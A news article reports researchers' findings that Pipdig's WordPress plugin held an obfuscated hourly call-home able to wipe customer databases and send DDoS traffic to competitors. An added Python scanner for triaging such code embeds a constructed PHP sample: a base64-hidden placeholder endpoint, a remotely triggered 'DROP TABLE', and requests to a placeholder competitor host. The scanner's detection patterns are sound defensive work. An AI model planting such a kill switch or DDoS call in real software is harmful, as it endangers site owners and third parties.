Security researchers found evidence that a Pipdig WordPress plugin contained suspicious code. Although Pipdig denied any wrongdoing, the company removed the questionable code from its plugin and repositories.
Pipdig makes custom themes for WordPress and Blogger, as well as the Pipdig Power Pack (P3) WordPress plugin, which is installed by default alongside any of its WordPress themes. Suspicious code found in the P3 plugin, some of it obfuscated, indicated that Pipdig was able to remotely reset customer blogs, change passwords or launch distributed denial-of-service (DDoS) attacks on competing sites.
The suspicious code was first reported by Mikey Veenstra, threat analyst at Wordfence, a WordPress security company, and Jem Turner, an independent developer, who conducted independent parallel investigations into Pipdig.
According to both reports, the P3 plugin contained code that uses Pipdig customer sites to issue hourly requests to Pipdig competitors’ sites in an effort to stage low-level DDoS attacks.
Pipdig responded by denying any malicious activity and providing rationales for the plugin having the access it did, but also quietly removed the suspicious code from both the plugin and the company’s code repositories. Veenstra followed up his initial report with more evidence that not only supported his claims, but showed direct contradictions in the Pipdig response.
The starkest contradiction was in Pipdig’s response to the accusation that the plugin contained a kill switch that could reset a user’s blog.
In Pipdig’s original response posted on March 29, the company said, “There is a function in the plugin which can be used to clear database tables, much like a backup or standard reset plugin. To confirm, we do not have the ability to ‘kill’ a site, nor would we ever, ever want to do that!”
In the follow-up response posted on March 31, Pipdig again asserted the functionality was not a kill switch. But the company admitted “there was a function in an older version of the plugin which could be used to reset a site back to the default settings.” Additionally, it implied the functionality was added in response to an incident in July 2018, in which Pipdig WordPress themes were stolen and resold illegally, and that it was used to reset those unauthorized sites.
However, Veenstra noted several discrepancies. The first is that, from the site owner’s perspective, there is no difference between a WordPress site reset to default and one whose database has been destroyed completely.
“Second, any honest plugin developer providing a legitimate means for a user to destroy their own database (whether that’s a good idea or not is a different story) would leave that choice strictly to the user. Instead of offering a user-facing button surrounded by ‘Are you sure you want to delete this entire database?’ warnings, the P3 plugin silently asks their servers once every hour if the database should be vaporized,” Veenstra wrote in a blog post. “Third, this answer conflicts with the previous one. Is this code for anti-piracy or for a ‘factory reset’? Has it ever been used or not?”
Veenstra said the commit adding this reset functionality to the P3 plugin was made on Nov. 7, 2017, months before the July 2018 piracy incident Pipdig cited as its motivation, and the code was still part of the plugin as of March 25, 2019, three days before Wordfence notified Pipdig of the issues.
Veenstra noted that he reached out to Pipdig at 12:29 p.m. on March 28, and that by 2:30 p.m. most of the offending code had been removed from the plugin, although the change log for the new version, 4.8.0, was altered to make it appear as though it had been released on March 24. Turner had kept a copy of version 4.7.3 of the Pipdig WordPress plugin, against which the claims can be verified. Additionally, Pipdig removed all code from its public Bitbucket repository on March 31.
Veenstra also found evidence that the Pipdig Blogger plugin included obfuscated code similar to that in the Pipdig WordPress plugin, which would direct DDoS traffic at competitors. Pipdig denied any DDoS attacks and claimed the code in question “is used to pass the theme’s license key to an external server.”
According to Veenstra, “None of this statement aligns with the actual behavior of the code.”
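The behaviour described in the reports above (a cron-scheduled hourly check-in with the vendor’s server that can trigger a database reset or requests to third-party sites, with the endpoints partly hidden behind obfuscation) is something a reviewer can triage statically before trusting a plugin. The Python scanner below is an added example and is not code from this article, from Wordfence, or from Pipdig; the PHP it scans is a constructed sample written to exhibit the pattern, and the hostnames license.example.com and competitor.example.org are placeholders.

```python
"""Static triage of a WordPress plugin for the pattern described in the reports:
a scheduled (hourly) call-home, remote-controlled destructive SQL, outbound
requests to third-party hosts, and obfuscation hiding the endpoints.
Heuristic: hits are leads for manual review, not proof of intent."""
import base64
import re

# Constructed sample plugin source used as input; it is NOT Pipdig's code.
SAMPLE_PLUGIN = r'''<?php
// Constructed sample: hourly call-home that can wipe tables or hit a third party.
add_action('init', function () {
    if (!wp_next_scheduled('sp_hourly_check')) {
        wp_schedule_event(time(), 'hourly', 'sp_hourly_check');
    }
});
add_action('sp_hourly_check', function () {
    global $wpdb;
    $resp = wp_remote_get(base64_decode('aHR0cHM6Ly9saWNlbnNlLmV4YW1wbGUuY29tL2NoZWNr'));
    $cmd  = trim(wp_remote_retrieve_body($resp));
    if ($cmd === 'reset') {
        $wpdb->query("DROP TABLE {$wpdb->prefix}posts");
    }
    wp_remote_get('https://competitor.example.org/?' . rand());
});
'''

# WP-Cron registration: captures the recurrence and the hook that will fire.
SCHEDULE_RE = re.compile(
    r"wp_schedule_event\s*\([^,]+,\s*['\"](\w+)['\"]\s*,\s*['\"](\w+)['\"]")
# Outbound HTTP primitives available to a plugin.
REMOTE_RE = re.compile(
    r"\b(wp_remote_get|wp_remote_post|wp_remote_request|curl_exec|fsockopen)\s*\(")
# SQL that destroys data; a user-facing reset would normally be gated by a UI confirmation.
DESTRUCTIVE_RE = re.compile(r"\b(DROP\s+TABLE|TRUNCATE\s+TABLE|DELETE\s+FROM)\b", re.I)
# Common PHP obfuscation / dynamic-execution wrappers.
OBFUSCATION_RE = re.compile(
    r"\b(eval|base64_decode|gzinflate|gzuncompress|str_rot13|create_function)\s*\(")
# Quoted literals that look like base64 (long, restricted alphabet).
B64_LITERAL_RE = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")
URL_RE = re.compile(r"https?://([\w.-]+)")


def decode_hidden_strings(src):
    """Return printable ASCII strings recovered from base64-looking literals."""
    out = []
    for m in B64_LITERAL_RE.finditer(src):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable() and text not in out:
            out.append(text)
    return out


def scan_plugin(src):
    """Line-by-line findings, keyed by category, for one plugin source file."""
    findings = {"scheduled_hook": [], "remote_request": [], "destructive_sql": [],
                "obfuscation": [], "hidden_strings": decode_hidden_strings(src)}
    for no, line in enumerate(src.splitlines(), 1):
        m = SCHEDULE_RE.search(line)
        if m:
            findings["scheduled_hook"].append((no, m.group(1), m.group(2)))
        if REMOTE_RE.search(line):
            findings["remote_request"].append((no, line.strip()))
        if DESTRUCTIVE_RE.search(line):
            findings["destructive_sql"].append((no, line.strip()))
        if OBFUSCATION_RE.search(line):
            findings["obfuscation"].append((no, line.strip()))
    return findings


def remote_hosts(src):
    """Hostnames the plugin may contact, including ones hidden behind base64."""
    hosts = set(URL_RE.findall(src))
    for s in decode_hidden_strings(src):
        hosts.update(URL_RE.findall(s))
    return sorted(hosts)


def assess(findings):
    """Combine findings into the behaviours the reports describe."""
    scheduled = bool(findings["scheduled_hook"])
    remote = bool(findings["remote_request"])
    return {
        "call_home": scheduled and remote,
        "remote_controlled_reset": scheduled and remote and bool(findings["destructive_sql"]),
        "hides_endpoints": bool(findings["obfuscation"]) and bool(findings["hidden_strings"]),
    }


if __name__ == "__main__":
    f = scan_plugin(SAMPLE_PLUGIN)
    for cat, items in f.items():
        for item in items:
            print(f"{cat:24} {item}")
    print("hosts:", remote_hosts(SAMPLE_PLUGIN))
    print("assessment:", assess(f))
```

Run it over every .php file in a plugin (`scan_plugin(open(path).read())`) and review each hit by hand; a scheduled hook that fetches instructions from a remote host and can drop tables is the combination worth escalating, whatever the vendor’s stated rationale. Because code can be removed quietly after disclosure, run the scan against an archived copy of the version that was actually deployed, as Turner did by keeping version 4.7.3, rather than against whatever the vendor currently ships.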
When Pipdig was contacted for comment, especially on the use of obfuscated code to hide some of this functionality, the company refused to comment and only pointed to its existing blog post, which does not mention obfuscated code.
We obtained a Pipdig support email from Phil Clothier, creative director at Pipdig, informing customers that the company was shutting down its hosting service for WordPress sites because it was unable to adequately address the “wave of support requests” that followed the security reports. Clothier wrote that Pipdig had arranged to transfer all customer sites to Kualo Ltd., a London-based hosting provider, and apologized for the inconvenience.
“To anyone which we have lost trust with, I deeply apologize for any stress/concern this has caused you,” Clothier wrote. “We will work hard to regain that trust and hopefully we can see you again in future when there is more clarity on events.”
Kualo, however, said via Twitter that Pipdig’s email was “a very premature announcement” and promised to provide more details on the arrangement in the near future.
Nicky Bloor, director of U.K.-based Cognitous Cyber Security, tweeted some of his own investigation into the Pipdig WordPress plugin and noted that Kualo had already begun to disable what it called “suspicious code” being run by Pipdig while Kualo investigated further.